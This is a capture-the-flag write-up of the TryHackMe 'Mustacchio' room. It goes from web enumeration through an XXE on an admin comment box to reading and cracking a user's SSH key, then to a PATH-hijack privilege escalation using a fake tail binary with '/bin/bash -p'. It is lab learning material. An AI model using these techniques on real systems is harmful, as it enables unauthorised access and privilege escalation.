This is/was a fairly long (45 min+) room. So I wont bother with “Step 1: do this” and “Step 2: do that”. Instead, I’ll show you how I did it.
I began by running an nmap scan using the attackerbox. I added the dns switch because for some reason, THM boxes seem to require it now. When you run nmap without it, their attackbox’s don’t seem to work.
Anyway, 3 ports open:
I went for port 80 first and that’s when I discovered, mustacchio:
Mustacchio was a VERY boring site. Not much functionality whatsoever. I ran dirb and got some hits. /custom/ stood out:
/custom/js/ had a file called: users.bak
users.bak contained a password hash, which could easily be cracked online:
From here, I went to the port we discovered earlier: 8765.
After logging in with “admin” and the password I’d just cracked, I was now faced with an admin page which allowed users to comment on the site:
I fired up burp and submitted the word “test”. This gave me some interesting information. 1) XML was in use and 2) the comments suggested A) Barry had a key and B) SSH required a key, which was most likely in Barry’s .ssh folder.
I took a look at the cookies and edited my cookie path to see if this would make any difference, but it didn’t seem to:
And that’s when I realised, it wanted me to download the /auth/dontforget.bak file. In the response, there was an XML file (which I would modify and make into my payload).
My payload looked as follows:
and it worked! I had XXE on the comment box:
I looked at the results of the XXE and could now confirm that the user ‘barry’ did exist. So now, I grabbed his private key from /home/barry/.ssh/id_rsa. If you look at the first line, you’ll see it says: “Proc-Type: 4,ENCRYPTED DEK-Info: AES128-CBC which means I’d have to try and crack it.
Proc-Type: 4,ENCRYPTED explicitly says the key is encrypted
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E tells you the encryption algorithm (AES-128-CBC) and the IV (initialization vector)
An unencrypted RSA key would jump straight into the base64 data right after -----BEGIN RSA PRIVATE KEY----- with no Proc-Type or DEK-Info headers.
from here I ran:
ssh2john barry_id_rsa > barry_hash.txt
john barry_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
which displayed the password. Now I could SSH as barry. Now we’re SSH’d in as barry, we can get the user flag:
sudo -l didn’t work (required a password) so I began looking for files with a sticky bit set.
I ran this command: find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null
This finds all SUID binaries on the system.
Breaking it down piece by piece:
find / searches the entire filesystem starting from the root directory
-perm -4000find files with the SUID bit set (the 4 in 4000). The - means "at least these permissions"
-exec ls -ldb {} \; for each result, run ls -ldb on it:
-l long format (shows permissions, owner, size, etc)
-dshow the directory entry itself, not its contents
-bescape non-printable characters
{} placeholder for each found file
\; terminates the -exec command
2>/dev/null suppress "permission denied" errors from directories you can't read
This command is used a lot when enumerating for priv esc, since SUID binaries run as the file owner (usually root) regardless of who executes them.
I ran “strings” on the /home/joe/live_log file and it contained the tail command without an absolute path, meaning we can do a path hijack by running:
For reference: echo '/bin/bash -p' >> tail was used because/bin/bash -p launches a bash shell with the -p flag, which means "don't drop privileges." Without -p, bash would see that the real UID (barry) doesn't match the effective UID (root) and drop back down to barry. The -p flag tells it to keep the root privileges. This is how we maintain root persistence once we run the exploit.
Also, by exporting the /tmp path variable, it places this first in the list, so when the /home/joe/live_log file is run, it looks in /tmp first and sees our malicious tail, and runs it as root, giving us root permissions.
Thanks for reading!
🍺 Quick message to readers: if my writeups help you, please consider a small donation to my buymeacoffee link here. This is not required but is very much appreciated! 🍺
